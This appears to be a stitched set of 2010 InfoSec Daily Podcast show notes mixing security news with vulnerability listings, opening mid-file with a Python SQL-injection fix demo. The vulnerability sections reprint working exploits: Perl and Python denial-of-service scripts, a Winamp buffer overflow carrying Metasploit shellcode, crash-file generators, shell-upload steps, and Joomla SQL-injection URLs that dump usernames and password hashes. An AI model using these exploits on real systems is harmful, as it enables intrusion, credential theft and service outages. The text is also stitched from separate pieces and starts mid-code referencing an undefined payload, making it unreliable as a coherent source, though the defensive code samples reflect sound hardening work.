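        CREATE TABLE order_status (order_status_id INTEGER, code TEXT, name TEXT, pos INTEGER);
        CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO order_status VALUES (1, 'P', 'Pending', 1);
        INSERT INTO order_status VALUES (2, 'C', 'Confirmed', 2);
        INSERT INTO jos_users VALUES (42, 'admin', 'constructed-hash-value');
    """)
    return con


def lookup_vulnerable(con, order_status_id):
    """Vulnerable: the parameter becomes part of the SQL text.

    A quote inside the value closes the literal, and whatever follows is parsed
    as SQL, which is exactly what the UNION ALL example URL relies on.
    """
    sql = ("SELECT order_status_id, code, name, pos FROM order_status "
           "WHERE order_status_id = '%s'" % order_status_id)
    return con.execute(sql).fetchall()


def lookup_safe(con, order_status_id):
    """Hardened: the value is bound as a parameter and is never parsed as SQL."""
    sql = ("SELECT order_status_id, code, name, pos FROM order_status "
           "WHERE order_status_id = ?")
    return con.execute(sql, (order_status_id,)).fetchall()


def lookup_typed(con, raw):
    """Defence in depth: coerce to the expected type at the boundary.

    Anything that is not an integer is rejected before it reaches the database,
    so neither the UNION payload nor a boolean probe is ever executed.
    """
    try:
        value = int(raw)
    except (TypeError, ValueError):
        raise ValueError("order_status_id must be an integer")
    return lookup_safe(con, value)


if __name__ == "__main__":
    con = make_db()
    print("normal:     ", lookup_vulnerable(con, "2"))
    print("vulnerable: ", lookup_vulnerable(con, UNION_PAYLOAD))
    print("bound:      ", lookup_safe(con, UNION_PAYLOAD))
```

Parameter binding is the fix; the type coercion in `lookup_typed` is cheap extra insurance and also stops the blind boolean probes of item 8, which otherwise reach the database as a legal, if useless, comparison. Note that the bound version does not error on the payload: it simply compares the whole string against the integer column and finds nothing, which is the behaviour you want.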


News Items of Interest:

News item 1: http://www.businesswire.com/portal/site/topix/?ndmViewId=news_view&newsId=20100127005098&newsLang=en
An IT security expert and blogger claims to have successfully intercepted and compromised phone calls made using 12 commercially available mobile voice encryption products. PhoneCrypt from SecurStar was one of only three solutions that successfully blocked the attacks that were made using a simple wiretapping Trojan.

“Like most security breaches, Notrax went for the weakest link; he did not attempt to crack the encryption itself, but used simple wiretapping techniques”

Using a readily available wiretapping utility, costing as little as $100, as well as his own ‘homemade’ Trojan, the blogger – aka Notrax – was able to bypass the encryption and eavesdrop by capturing conversations from the microphone and speaker in real time. By suppressing any rings, notifications or call logs, these attacks go completely undetected. And while Trojans can be installed manually by someone with access to the phone, they could equally be delivered via email, SMS or a mobile application.

Notrax describes his tests extensively at www.infosecurityguard.com with links to Youtube videos.
News item 2: http://www.newsfactor.com/story.xhtml?story_id=12200DUI6NKA&full_skip=1
In a move that could invigorate weak sales of Google’s Nexus One smartphone, Wal-Mart, the world’s largest retailer, appears ready to start selling the device. According to one online report, the cost could be as low as $99 — much lower than the subsidized $179 price from T-Mobile with a two-year plan.

News item 3: http://www.internetnews.com/security/article.php/3860871

Data breach incidents cost companies an average of $6.75 million each time, according to a new study released by security researcher The Ponemon Institute and PGP Corp., an e-mail and data encryption security software developer.

And while the study found that the total number of reported data breaches declined from 657 incidents in 2008 to 498 last year, the average cost inched up from $202 to $204 per customer record.

The firms’ joint U.S. Cost of Data Breach Study chronicles a wide range of cost factors, including the outlays for detection, escalation, notification and response along with legal, investigative and administrative expenses, customer defections, opportunity loss and reputation management.

The $6.75 million cost per incident was slightly higher than the $6.65 million enterprise clients shelled out in 2008. Those figures include the costs associated with customer support such as information hotlines and credit monitoring subscriptions.

Technical Segment: http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php

2010
01.27

Episode 55 – Taint Garden

InfoSec Daily Podcast

InfoSec Podcast Episode 55 for January 27, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Register online at the SANS website or call (301) 654-SANS (7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

  1. P2GChinchilla HTTP Server version 1.1.1 is subject to a remote denial of service. Exploit code is available:

    #!/usr/bin/perl
    # File Name : P2GChinchilla[TM] HTTP Server
    # Vuln : Remote Denial Of Service Exploit
    # Author : Zer0 Thunder
    # Msn : zer0_thunder@colombohackers.com
    #
    #
    ##==------>>
    #
    # Exploit Title: P2GChinchilla[TM] HTTP Server 1.1.1 Remote Denial Of Service Exploit
    # Date: 22/01/2010
    # Author: Zer0 Thunder
    # Site : http://www.proggies2go.org/pages/p2gChinchilla.html?ref=PAD
    # Software Link: http://www.proggies2go.org/pages/p2gChinchilla/p2gChinchilla.rar
    # Version: v 1.1.1
    # Tested on: Server runs on Windows XP Sp2 /Test on Remote Location
    ##==------>>
    use IO::Socket::INET;
    $ip = $ARGV[0];
    $port = $ARGV[1];
    if (! defined $ARGV[0])
    {
        print "\t+================================================================+\n";
        print "\t+ -- P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service --+\n";
        print "\t+ -- Author :Zer0 Thunder --+\n";
        print "\t+ -- DATE: :[24/01/2010] --+\n";
        print "\t+ -- ------------------------------------------------ --+\n";
        print "\t+ -- Usage :perl exploit.pl [Host/Remote IP] [Port] --+\n";
        print "\t+ -- --+\n";
        print "\t+================================================================+\n";
        print "\n";
        print " Ex : exploit.pl localhost 50000\n"; # P2GChinchilla Default Port is 50000

        exit;
    }

    print "\t+================================================================+\n";
    print "\t+ -- P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service --+\n";
    print "\t+ -- Author :Zer0 Thunder --+\n";
    print "\t+ -- DATE: :[24/01/2010] --+\n";
    print "\t+ -- ------------------------------------------------ --+\n";
    print "\t+ -- Usage :perl exploit.pl [Host/Remote IP] [Port] --+\n";
    print "\t+ -- --+\n";
    print "\t+================================================================+\n";
    print "\n";
    print " Wait Till The Buffer is Done\n";
    my $b1 = "\x41" x 100000000;
    print "\n";
    print " DoS is UP !.. N Give it a Second \n";

    $DoS = IO::Socket::INET->new("$ip:$port") or die;

    print $DoS "stor $b1\n";
    print $DoS "QUIT\n";

    close $DoS;

    # exit :

  2. The login page of the F2L-3000 version 4.0.0 is vulnerable to SQL injection. Exploitation of the vulnerability may allow attackers to bypass authentication and access sensitive information stored on the device.  A patch is not available at this time. Possible workarounds include disabling the vulnerable service or limiting access to a set of trusted IP addresses.
  3. Winamp version 5.572 is subject to a local buffer overflow.  Exploit code is available:

#!/usr/bin/perl

# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.

print "\n#########################################\n";
print "# Winamp 5.572 stack buffer overflow #\n";
print "# PoC by: Debug (eldadru@gmail.com) #\n";
print "# Exploit by: NeoCortex (ICQ 158005940) #\n";
print "#########################################\n";

print " Where's the next phone box to the matrix please?\n\n\n";

my $version = "Winamp 5.572";

my $junk = "\x41" x 540;               # filler up to the saved return address
my $eip = "\xad\x86\x0e\x07";          # overwrite EIP - 070E86AD FFD4 CALL ESP nde.dll
my $nop = "\x90" x 100;                # NOP sled before the payload

my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a".
"\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e".
"\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54".
"\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64".
"\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f".
"\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f".
"\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d".
"\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44".
"\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35".
"\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a".
"\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b".
"\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57".
"\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b".
"\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63".
"\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59".
"\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73".
"\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63".
"\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33".
"\x30\x47";

open (myfile, '>> whatsnew.txt');
print myfile $version.$junk.$eip.$nop.$shellcode;

print "[+] whatsnew.txt written.\n";
print "[ ] Now copy it to your winamp folder...\n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";

  4. BoastMachine version 3.1 is subject to a remote shell upload vulnerability.
     • First register on the site at /Server/path/register.php
     • Log in at /Server/path/login.php
     • After login, go to /Server/path/bmc/files.php?form_id=new
     • Now upload your shell like ( Shell.php.rar ) and you will find your shell here /Server/path/files/username_Shell.php.rar
     • http://sample.com/hp_boastMachine/files/username_Shell.php.rar

  5. Safari version 4.0.4 is subject to a JavaScript crash denial-of-service vulnerability.  The following piece of JavaScript will crash Safari nicely when triggered using one of the methods described below. PoC code is available:
<script>
var data = "A";
while (data.length < 0x40000) {
    data += data;
}
data2 = new Array();
for (x = 0; x < 4000; x++) {
    data2[x] = data + data;
}
</script>


News Items of Interest:

News item 1: http://www.benedelman.org/news/012610-1.html
Do you run Google's Toolbar? Did you disable the transmission to Google of the full URL of every page view, including searches at competing search engines? Even if a user wants to disable such transmission, it's fairly easy to turn it off, right?  You might be surprised to learn that apparently "disable" means "don't disable" when you're using "Enhanced Features" mode.

By the way, the standard Google Toolbar installation encourages users to activate that mode via a "bubble" message shown at the conclusion of installation.  The bubble presents a forceful request for users to activate Sidewiki, which is described as "enhanced" and "helpful", and Google chooses to tout it with a prominence that indicates Google views the feature as important. Moreover, the accept button features bold type plus a jumbo size (more than twice as large as the button to decline). And the accept button has the focus, so merely pressing Space or Enter (easy to do accidentally) activates Enhanced Features without any further confirmation.

News item 2:  http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3211151
The hacker best known for cracking Apple's iPhone says he's done it again, this time with Sony's PlayStation 3. In a blog post, George Hotz said that after a five-week effort, he'd finally managed to run his own software on the PlayStation 3, which typically only plays digitally signed software that is approved by Sony. "I have read/write access to the entire system memory, and [hypervisor] level access to the processor," he wrote. "In other words, I have hacked the PS3."  He pulled off the feat using "very simple hardware, cleverly applied, and some not so simple software," he added.

News item 3: http://news.cnet.com/8301-1009_3-10442305-83.html?part=rss&subj=news&tag=2547-1_3-0-20

The “Verified by Visa” credit-card authentication system has come under criticism from Cambridge University researchers, who say it is training online shoppers to adopt risky security habits.

The feature, which is used to authenticate online financial transactions, confuses people by not displaying security cues, security engineering researchers Ross Anderson and Steven Murdoch said in a paper (PDF) published Tuesday.

The primary purpose of 3DS is to allow a merchant to establish whether a customer controls a particular card number. It is essentially a single sign-on system, operated by Visa and MasterCard, and it differs in two main ways from existing schemes such as OpenID or InfoCard.

3D Secure is an XML-based protocol used as an added layer of security for online credit and debit card transactions. It was developed by Visa to improve the security of Internet payments and offered to customers as the Verified by Visa service. Services based on the protocol have also been adopted by MasterCard, under the name MasterCard SecureCode, and by JCB International as J/Secure.

3-D Secure adds another authentication step for online payments. Merchants are encouraged to use 3-D Secure to achieve higher coverage against fraud losses. When a merchant does not use 3-D Secure they are liable for fraudulent transactions even if the transaction was properly authorized.  3-D Secure should not be confused with the Card Security Code which is a short numeric code that is printed on the card.

Before 3DS can be used to authenticate transactions, cardholders must register a password with their bank. A reasonably secure method would be to send a password to the customer's registered address, but to save money the typical bank merely solicits a password online the first time the customer shops online with a 3DS-enabled card, known as activation during shopping (ADS).

News item 4: http://www.computerworld.com/s/article/9149218/Bank_sues_victim_of_800_000_cybertheft?
A Texas bank is suing a customer hit by an $800,000 cybertheft incident in a case that could test the extent to which customers should be held responsible for protecting their online accounts from compromises.  In November, unknown attackers based in Romania and Italy initiated a series of unauthorized wire transfers from Hillary’s bank accounts and depleted it by $801,495. About $600,000 of the amount was later recovered by PlainsCapital. Hillary demanded that the bank repay it the rest of the stolen money. In a letter to the bank in December, Hillary claimed that the theft happened only because PlainsCapital had failed to implement adequate security measures. The bank sought to absolve itself from blame in the heist by stating that the unauthorized wire transfer orders had been placed by someone using valid Internet banking credentials belonging to Hillary Machinery. “PlainsCapital accepted the wire transfer orders in good faith,” and had therefore not breached any of its agreements with Hillary, the bank said in its complaint.

The case is also unusual because it is believed to be the first in which a bank has launched a pre-emptive lawsuit against a customer victimized by a cyber theft. Several other cases, where companies that have been victims of such thefts have sued their banks for failing to implement reasonable security measures, are pending in courts around the country.

Hillary is still deciding its next steps, but according to its lawyer, Patrick Madden, the company will next file a response asserting that it was the bank’s failure to employ suitable security controls that resulted in the theft.
News item 5: http://www.omaha.com/article/20100126/NEWS97/701269885
Federal prosecutors in California say a Nebraska man will plead guilty to participating in a cyber attack on Church of Scientology Web sites in January 2008.

Brian Thomas Mettenbrink agreed to plead guilty Monday to the misdemeanor charge of unauthorized access of a protected computer, said Thom Mrozek, a spokesman for the U.S. attorney’s office in Los Angeles. Mettenbrink faces a year in federal prison.

Court records say Mettenbrink attacked Scientology Web sites as part of Anonymous, an underground group that protests the Church of Scientology, accusing it of Internet censorship.

Prosecutors say hackers conducted a “denial of service” attack, in which computers flood a target Web site with malicious Internet traffic, making it unavailable to legitimate users.

News item 6: http://news.techworld.com/security/3211146/researcher-reveals-another-ie-security-flaw/?olo=rss

A flaw in Microsoft’s Internet Explorer could allow a hacker to read files on a person’s computer, according to a security researcher. The claim represents another problem for the company just days after a serious vulnerability received an emergency patch. The problem was actually discovered as long as two years ago but has persisted despite two attempts by Microsoft to fix it, said Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies. He is scheduled to give a presentation at Washington’s Black Hat conference on 3 February.

News item 7: http://blog.commandlinekungfu.com/

2010
01.26

Episode 54 – Meat Detonation

InfoSec Daily Podcast

 
InfoSec Podcast for January 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

FORENSICS 606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Register online at the SANS website or call (301) 654-SANS (7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

  1. The JBDiary component for Joomla! is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:

    http://www.sample.com/?newyear=2011'+and+substring(@@version,1,1)=4%23&newmonth=01

    http://www.sample.com/?newyear=2011'+and+substring(@@version,1,1)=5%23&newmonth=01

    http://www.sample.com/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=4%23

    http://www.sample.com/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=5%23

  2. IBM SolidDB is subject to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. This issue affects SolidDB 6.30.0.29 and 6.30.0.33; other versions may also be affected.  Exploit code is available:
    #!/usr/bin/env python
    import socket
    import struct

    # maxlen 0xA
    a = struct.pack('<b', 2)
    a += struct.pack('<H', 0)
    a += struct.pack('<H', 0xFEFF)
    a += struct.pack('<H', 0xFEFF)
    a += "1234"

    target_ip = 'X.X.X.X'

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, 2315))

    s.send(a)
    s.close()

  3. Google Chrome is subject to multiple vulnerabilities including multiple memory-corruption issues, multiple security-bypass issues, input-validation issues and denial-of-service issues. Attackers can exploit these issues to bypass certain security checks, execute arbitrary code in the context of the browser, and cause denial-of-service conditions; other attacks are also possible. Versions prior to Chrome 4.0.249.78 are vulnerable. Attackers can use standard tools to exploit some of the issues; other issues may require exploit code.
  4. Adobe Reader and Acrobat are subject to a remote security-bypass vulnerability. An attacker can exploit this issue to obtain the contents of sensitive PDF files or to perform cross-site scripting attacks against domains hosting PDF files. Example PDF:
    %FDF-1.2
    1 0 obj
    <<
    /FDF
    <<
    /F(http://www.sample.com/any.pdf)
    /JavaScript
    <<
    /After (app.alert("Executing script inside Acrobat at "+URL);)
    >>
    >>
    >>
    endobj
    trailer
    <</Root 1 0 R>>
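A triage check for the kind of FDF shown above, as an added example that is not code from the podcast or from Adobe: it pulls out the PDF the FDF points the reader at and any JavaScript hooked to run around that load, and flags the pairing of a remote /F target with script. The regexes only handle the flat dictionary layout of the sample, which is embedded so the check runs offline.

```python
"""Triage an FDF file: which PDF does it open, and does it carry JavaScript? (added example)"""
import re

# The example FDF from the advisory above, embedded so the check runs offline.
FDF_SAMPLE = """%FDF-1.2
1 0 obj
<<
/FDF
<<
/F(http://www.sample.com/any.pdf)
/JavaScript
<<
/After (app.alert("Executing script inside Acrobat at "+URL);)
>>
>>
>>
endobj
trailer
<</Root 1 0 R>>
"""

# /F names the PDF the reader loads the form data into; in the advisory's
# abuse the FDF comes from one site and /F points at a PDF on another.
F_RE = re.compile(r"/F\s*\(([^)]*)\)")
# Flat /JavaScript << ... >> dictionary (no nested dictionaries handled);
# /Before and /After run around the load, /Doc declares document scripts.
JS_DICT_RE = re.compile(r"/JavaScript\s*<<(.*?)>>", re.S)
JS_HOOK_RE = re.compile(r"/(Before|After|Doc)\b")


def inspect_fdf(data):
    """Summarise the FDF: target PDF, script hooks and whether the pairing is risky."""
    if not data.lstrip().startswith("%FDF-"):
        raise ValueError("not an FDF file")
    target = F_RE.search(data)
    target_url = target.group(1).strip() if target else None
    remote = bool(target_url) and bool(re.match(r"https?://", target_url, re.I))
    js = JS_DICT_RE.search(data)
    hooks = sorted(set(JS_HOOK_RE.findall(js.group(1)))) if js else []
    return {
        "target": target_url,
        "remote_target": remote,
        "js_hooks": hooks,
        # script that runs in the context of a PDF fetched from elsewhere
        "risky": remote and bool(hooks),
    }


if __name__ == "__main__":
    print(inspect_fdf(FDF_SAMPLE))
```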


News Items of Interest:

News item 1: http://www.theregister.co.uk/2010/01/25/oil_companies_attacked/

At least three US oil companies were victims of highly targeted, email-borne attacks designed to siphon valuable data from their corporate networks and send it abroad, according to a published report citing unnamed people and government documents.

The attacks against Marathon Oil, ExxonMobil, and ConocoPhillips began with emails sent to senior executives that included links to booby-trapped websites, according to the report in The Christian Science Monitor. The breaches focused on the companies’ proprietary “bid data” detailing the quantity, value, and location of petroleum discoveries worldwide. The report said at least some of the attacks appeared to originate in China, but didn’t provide proof beyond the existence of servers located in that country used to store some of the stolen data.

News item 2: http://www.dailymail.co.uk/news/article-1245622/For-sale-Personal-details-millions-Ladbrokes-gamblers.html

The confidential records of millions of British gamblers who bet with top bookmaker Ladbrokes have been offered for sale to The Mail on Sunday.

The huge data theft is now at the center of a criminal investigation after this newspaper was given the personal information of 10,000 Ladbrokes customers and offered access to its database of 4.5 million people in the UK and abroad.  The records include customers’ home addresses, details of their gambling history, customer account numbers, dates of birth, phone numbers and email addresses.

News item 3: http://www.lasvegassun.com/news/2010/jan/25/umc-patient-info-leaks-likely-date-back-july/
For more than three months someone at University Medical Center illegally leaked the personal information of traffic accident victims — a breach of social security numbers, birth dates and more that only stopped when the Las Vegas Sun contacted the hospital about it, according to a statement released today by UMC.

News item 4: http://news.cnet.com/8301-27080_3-10441004-245.html

People behind the China-based online attacks of Google and other companies looked up key employees on social networks and contacted them pretending to be their friends to get the workers to click on links leading to malware, according to a published report on Monday.  “The most significant discovery is that the attackers had selected employees at the companies with access to proprietary data, then learnt who their friends were,” the Financial Times reported. “The hackers compromised the social network accounts of those friends, hoping to enhance the probability that their final targets would click on the links they sent.”
News item 5: http://blog.osvdb.org/2010/01/24/microsoft-aurora-and-something-about-forest-and-trees
Why do we care that Microsoft sits on vulnerabilities for six months? Why is that such a big deal? Am I the only one who missed the articles pointing out that they actually sat on five other code execution bugs for much longer?

CVE            Reported to MS  Disclosed   Time to Patch
CVE-2010-0244  2009-07-14      2010-01-21  6 Months, 7 Days (191 days)
CVE-2010-0245  2009-07-14      2010-01-21  6 Months, 7 Days (191 days)
CVE-2010-0246  2009-07-16      2010-01-21  6 Months, 5 Days (189 days)
CVE-2010-0248  2009-08-14      2010-01-21  5 Months, 7 days (160 days)
CVE-2010-0247  2009-09-03      2010-01-21  4 Months, 18 days (140 days)
CVE-2010-0249  2009-09-??      2010-01-14  4 Months, 11 days (133 days) – approx
CVE-2010-0027  2009-11-15      2010-01-21  2 Months, 6 days (67 days)
CVE-2009-4074  2009-11-20      2009-11-21  2 Months, 1 day (62 days)

News item 6: http://www.businesscomputingworld.co.uk/?p=3347

Some additional news out of CES is that Victorinox’s swiss army knife remained uncracked – and that the $100,000 prize went unclaimed.  Even if someone had cracked the 2010 version of the famous Swiss Army knife, they would have obtained a lot more than $100,000 from other sources. Victorinox, the manufacturers of the Swiss Army knife, which dates back to the late 1800s in its various forms, has made much of the unit’s tamper-proof self-destruct mode, but the reality is that the crypto USB drive supports elliptical curve and AES encryption, which makes it almost impervious to crackers using current known technology.
As Schneier observed in his research, cryptography is all about safety margins. If a hacker manages to crack 128-bit AES technology, then you can bet your bottom line that Schneier would be interested, and governments would pay a lot more than $100,000 for the secret. But this clearly isn’t going to happen for some time to come, so I think Victorinox’ cash is safe for the time being.

News item 7:  http://www.wired.com/threatlevel/2010/01/jilsi-pleads-guilty

A former ringleader of a top internet carding site run secretly by the FBI has pleaded guilty in the United Kingdom. Renukanth Subramaniam, aka JiLsi, was a former Pizza Hut delivery guy who helped run one of the leading English-language criminal sites, DarkMarket. The site operated as an international cyber-bazaar for more than 2,000 hackers, carders and identity thieves until it was closed in 2008.

Members of the site traded in stolen bank card and identification data. They bought and sold specialized equipment for skimming card and PIN numbers, and for cloning data to blank cards. The activities on DarkMarket are estimated to have resulted in fraud amounting to tens of millions of dollars.

News item 8:http://news.cnet.com/8301-27080_3-10439263-245.html

The California Department of Motor Vehicles department suffered a network outage on Thursday due to an equipment glitch, a state official said. A router switch malfunctioned, said Bill Maile, spokesman for Office of Technology Services for the state of California. “It’s very rare,” he said. “Our staff quickly diagnosed the problem and re-routed network traffic to restore connectivity.” The network was down for about two hours and was restored at about 1:40 p.m. PST, according to Maile. There are 168 DMV offices throughout the state, said Jan Mendoza, spokeswoman for the DMV. “We didn’t close offices,” she said. “When people came in we handled customers manually. We did it the old-fashioned way–with pen and paper.”
News item 9:http://www.eetimes.com/news/design/showArticle.jhtml?articleID=222301321
The IEEE has launched a new Web site that consolidates information about smart electric grids from it various societies. The portal is one of many activities from an IEEE smart grid initiative coordinating the organization’s work on the transition to digital, networked power systems and services.

The smart grid is “so interdisciplinary,” said Wanda Reder, chair of the IEEE Smart Grid Task Force and former president of the IEEE Power & Energy Society. “We have the gamut covered in technical interests, but we needed a way to facilitate communications between our many entities to link information on all the conferences, papers and standards we have in this area,” she added.

The Web site lists many of the estimated 100 existing IEEE standards related to smart grids. It also includes pointers to the IEEE 2030 group started last year that aims to release a draft guide to smart grid design in early 2011.
News item 10:  http://news.zdnet.co.uk/security/0,1000000189,40005862,00.htm?s_cid=248
Many organizations are focused on stopping random hackers and blocking pornography when they should be concerned with bigger threats from professional cybercriminals, according to a new cybersecurity report.

In a survey conducted in 2009 of 523 IT and security managers, top-level executives and law-enforcement personnel, hackers were rated the biggest threat, followed by insiders and foreign entities — probably because hackers are the “noisiest and easiest to detect”, the 2010 CyberSecurity Watch Survey concluded.

2010
01.25

InfoSec Daily Podcast

 

InfoSec Podcast Episode 53 for January 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

FORENSICS 606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Register online at the SANS website or call (301) 654-SANS (7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

  1. IntelliTamper is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. This issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed exploit attempts will likely crash the application, denying service to legitimate users.  IntelliTamper 2.07 and 2.08 are vulnerable; other versions may also be affected. Proof-of-concept and exploits are available:
    #!/usr/bin/perl
    # H0m3 : S3curity-art.com & Google.com
    # M4!L : Wizard-skh@hotmail.com & My@hotmail.it
    # usage : perl xpl.pl >>xpl.html
    # builds an HTML page whose <script defer="..."> attribute holds 3076 'A' bytes
    my $IntelliTamper_html = '<html><head><title>SkuLL-HackeR Home World</title></head><body>' .
    '<script defer="' .
    "\x41" x 3076 .
    '">' .
    "</body></html>";
    print $IntelliTamper_html;
  2. PunBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.  PunBB 1.3 is vulnerable; other versions may also be affected. Google Dork: inurl: viewtopic.php?pid= Example URL: http://www.sample.com/forum/viewtopic.php?pid=[Xss]
  3. The 'com_gameserver' component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/component/gameserver/?view=gameserver&grp=-1'+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%2
  4. The 'com_gurujibook' component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL available: http://www.sample.com/index.php?option=com_gurujibook&task=showPDF&bookid=-32+union+all+select+concat(username,0x3a,password),2,3,4+from+jos_users--
  5. The JbPublishDownFp component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-1+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users
  6. The Mochigames component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/[JOOMLA_PATH]/index.php?view=mochigames&id=99999%27+union+select+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%23&option=com_mochigames&Itemid=80
  7. VMware Player is subject to an .m3u skin file local heap overflow. Proof of concept is available:
    #!/usr/bin/perl
    # By : Pr0f.SeLLiM
    # VMware Player (.m3u Skin File) Local Heap Overflow PoC
    ########################
    ##EBX 41414141
    ##ESP 0012EF6C
    ##EBP 00DA50F8 ASCII "C:\Program Files\VMware Player\skins\crash.M3u"
    ##ESI 0012EFD8
    ##EDI 014143F8
    ##EIP 7C90EAF0 ntdll.7C90EAF0
    #############################################################
    # write 5000 'A' bytes to the crash file
    my $boom = "\x41" x 5000;
    my $file = "crash.dat";
    open($FILE, ">$file");
    print $FILE $boom;
    close($FILE);
    print "File Successfully Created\n";
    #####
